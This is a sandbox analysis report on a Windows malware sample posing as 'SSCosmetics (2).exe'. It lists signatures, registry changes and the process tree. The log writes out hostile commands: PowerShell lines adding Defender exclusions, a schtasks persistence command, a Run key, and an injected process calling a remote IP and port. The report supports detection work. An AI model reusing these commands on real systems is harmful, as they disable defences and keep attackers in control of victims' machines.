Analysis Overview
SHA256
1fd1e3eceac872dffbc901adfba60312f30068884c2ef3ae8f15d6ce6f7aa474
Threat Level: Known bad
The file SSCosmetics (2).exe was found to be: Known bad.
Malicious Activity Summary
Contains code to disable Windows Defender
Checks computer location settings
Executes dropped EXE
Drops startup file
Adds Run key to start application
Looks up external IP address via web service
Suspicious use of SetThreadContext
Unsigned PE
Enumerates physical storage devices
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of WriteProcessMemory
Suspicious behavior: AddClipboardFormatListener
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Checks processor information in registry
Suspicious use of FindShellTrayWindow
Creates scheduled task(s)
Enumerates system info in registry
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Uses Task Scheduler COM API
Modifies Internet Explorer settings
Modifies registry class
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-07 18:21
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-07 18:21
Reported
2024-04-07 18:38
Platform
win10v2004-20240226-en
Max time kernel
433s
Max time network
458s
Command Line
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk | C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk | C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\System.exe | N/A |
| N/A | N/A | C:\Users\Admin\System.exe | N/A |
| N/A | N/A | C:\Users\Admin\System.exe | N/A |
| N/A | N/A | C:\Users\Admin\System.exe | N/A |
| N/A | N/A | C:\Users\Admin\System.exe | N/A |
| N/A | N/A | C:\Users\Admin\System.exe | N/A |
| N/A | N/A | C:\Users\Admin\System.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Users\\Admin\\System.exe" | C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4404 set thread context of 3828 | N/A | C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\explorer.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 | C:\Windows\explorer.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe
"C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SSCosmetics (2).exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\System.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System" /tr "C:\Users\Admin\System.exe"
C:\Users\Admin\System.exe
C:\Users\Admin\System.exe
C:\Users\Admin\System.exe
C:\Users\Admin\System.exe
C:\Users\Admin\System.exe
C:\Users\Admin\System.exe
C:\Users\Admin\System.exe
C:\Users\Admin\System.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 147.185.221.19 21574 <123456789> DF9D76493D2052CA298B
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c explorer shell:::{3080F90E-D7AD-11D9-BD98-0000947B0257}
C:\Windows\SysWOW64\explorer.exe
"C:\Windows\system32\explorer.exe" shell::: -encodedCommand MwAwADgAMABGADkAMABFAC0ARAA3AEEARAAtADEAMQBEADkALQBCAEQAOQA4AC0AMAAwADAAMAA5ADQANwBCADAAMgA1ADcA -inputFormat xml -outputFormat text
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff862bf46f8,0x7ff862bf4708,0x7ff862bf4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,8011230451825925835,11903101137192340615,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2152 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,8011230451825925835,11903101137192340615,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=2184 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,8011230451825925835,11903101137192340615,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=2800 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8011230451825925835,11903101137192340615,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8011230451825925835,11903101137192340615,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8011230451825925835,11903101137192340615,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4768 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8011230451825925835,11903101137192340615,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,8011230451825925835,11903101137192340615,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=5040 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,8011230451825925835,11903101137192340615,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=5040 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,8011230451825925835,11903101137192340615,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2164 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,8011230451825925835,11903101137192340615,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2140 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,8011230451825925835,11903101137192340615,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2760 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,8011230451825925835,11903101137192340615,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=5080 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,8011230451825925835,11903101137192340615,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3872 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8011230451825925835,11903101137192340615,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4984 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8011230451825925835,11903101137192340615,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5088 /prefetch:1
C:\Users\Admin\System.exe
C:\Users\Admin\System.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
